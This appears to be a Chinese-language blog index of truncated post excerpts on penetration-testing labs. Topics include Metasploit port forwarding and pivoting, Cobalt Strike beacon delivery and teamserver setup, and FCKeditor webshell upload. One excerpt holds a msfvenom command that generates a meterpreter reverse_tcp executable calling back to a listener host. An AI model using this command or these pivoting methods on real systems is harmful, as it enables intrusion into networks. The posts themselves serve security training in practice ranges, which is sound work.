
Metasploit—端口转发
拿下目标服务器,开始对内网进行探测。 此时,服务器是公网IP,但是我们想要访问内网中 192.168.234.160 的3389端口,登上远程桌面。由于在内网,我们无法直接连接,所以我们需要端口转发,将192.168.234.160机器的3...
拿下目标服务器,开始对内网进行探测。 此时,服务器是公网IP,但是我们想要访问内网中 192.168.234.160 的3389端口,登上远程桌面。由于在内网,我们无法直接连接,所以我们需要端口转发,将192.168.234.160机器的3...
路由转发 在我们成功拿到meterpreter的shell之后,想要探测内网的信息,这时候我们就要用到路由转发了。 大致的意思就是,利用msf添加一条通向内网的路由,我们利用这条添加的路由,去扫描内网的信息,发现存活的主机。如果不加路由的话...
上线 先利用命令生成一个马: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.151 lport=2345 -f exe >hackergugu.exe 然后...
扫描网站目录发现了robots.txt,找到/user.php.bak 得到网站的源代码 <?php class UserInfo { public $name = ""; public $age = 0; public $blog ...
各个版本的fck编辑都会多多少少带漏洞,我们通常利用文件上传漏洞上传webshell,从而拿下目标机器。墨者学院的靶场很好的提供了实验机会,正好练练手。 查看FCK的版本 /FCKeditor/_whatsnew.html查看此目录文件 &...
总结一下几个常用的cs上线方式。 Windows EXE 点击Generate,会生成一个exe文件,令目标机器运行此exe文件,即可上线。 Windows Service EXE 虽然这也是一个exe文件,但是它需要通过服务来上线。我们先...
接触cobalt strike也有一段时间了,使用的版本是3.14,期间我使用的众多破解版本都存在许多bug,例如exit暗桩问题,导致目标机器无法正常回连,无法正常提权……甚至有的版本还存在卡死问题,无法配合Ladon使用。 最后,我终于...
简单来讲,cobaltstrike的服务端由两部分组成,teamserver和cobaltstrike.jar 首先,teamserver的运行需要配置java环境。 我的服务器是centos7.2,接下来安装Java环境。 vi inst...
由于部分靶场受到墙的影响,无法正常搭建,所以我还是选择放到我的日本服务器上来了。 我的服务器是centos。 第一步安装docker yum install docker-ce docker -v//查看docker版本,检测docker是...